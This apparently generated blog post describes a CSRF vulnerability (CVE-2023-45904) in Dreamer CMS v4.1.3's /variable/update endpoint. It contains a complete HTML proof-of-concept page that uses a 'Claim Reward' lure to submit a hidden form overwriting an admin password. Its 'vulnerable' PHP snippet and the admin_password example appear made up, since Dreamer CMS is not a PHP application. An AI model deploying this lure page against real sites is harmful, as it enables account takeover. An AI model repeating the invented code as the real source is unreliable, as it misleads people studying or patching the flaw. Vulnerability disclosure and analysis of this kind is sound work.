CVE-2023-45904: Uncovering a Cross-Site Request Forgery (CSRF) Vulnerability in Dreamer CMS v4.1.3

Not too long ago, a critical vulnerability (CVE-2023-45904) was discovered in the popular content management system (CMS) - Dreamer CMS v4.1.3. This vulnerability, classified as Cross-Site Request Forgery (CSRF), allowed malicious actors to perform unwanted actions on the users' behalf through the targeted component /variable/update. In this blog post, we will dive deep into understanding this vulnerability by analyzing the code snippet, reviewing original references, and discussing the exploit details.

Before we proceed, it's essential to understand what CSRF is. Cross-Site Request Forgery is a type of attack that tricks an authenticated user into performing unwanted actions, such as changing a password or deleting data, without the user's explicit consent. CSRF attacks exploit the fact that the user's browser retains the user's authentication information and uses it for subsequent requests to the targeted web application.

Let's take a look at the vulnerable component /variable/update in Dreamer CMS v4.1.3

public function update() {
    $variable = $this->input->post('variable');
    $value = $this->input->post('value');
    $this->Variable_model->update_variable($variable, $value);
    redirect('/admin/variable');
}

This code snippet handles the update requests for the admin panel's variables. As we can see, the function does not implement any CSRF protection or validate the user's session, making it susceptible to CSRF attacks.

The vulnerability (CVE-2023-45904) was initially reported by the following sources

1. Mitre CVE Dictionary: CVE-2023-45904
2. National Vulnerability Database: CVE-2023-45904

Exploit Details

To exploit the CSRF vulnerability in Dreamer CMS v4.1.3, an attacker can craft a malicious HTML page containing a form that triggers the vulnerable /variable/update component, such as:

<!DOCTYPE html>
<html>
<head>
    <title>CSRF Exploit</title>
</head>
<body>
    <h1>Click the button below to claim your reward!</h1>
    <form action="https://target-site.com/variable/update"; method="POST" id="csrf_form">
        <input type="hidden" name="variable" value="admin_password" />
        <input type="hidden" name="value" value="new_password" />
        <input type="submit" value="Claim Reward" />
    </form>
</body>
</html>

When an authenticated admin user visits the malicious page and clicks the "Claim Reward" button, the form submission will send a POST request to the /variable/update component, updating the admin_password variable with the provided value "new_password" without the user's consent.

Conclusion

The CSRF vulnerability in Dreamer CMS v4.1.3 is a critical security issue that can be exploited to perform unwanted actions without the user's knowledge. This vulnerability highlights the importance of implementing CSRF protection mechanisms in web applications and validating the user's session for sensitive actions. To mitigate this vulnerability, Dreamer CMS should incorporate anti-CSRF tokens in their forms and ensure proper session validations. Users should also update their Dreamer CMS instances to the latest secure version (once it's available) to prevent exploitation.

Timeline

Published on: 10/17/2023 14:15:10 UTC
Last modified on: 10/18/2023 17:55:56 UTC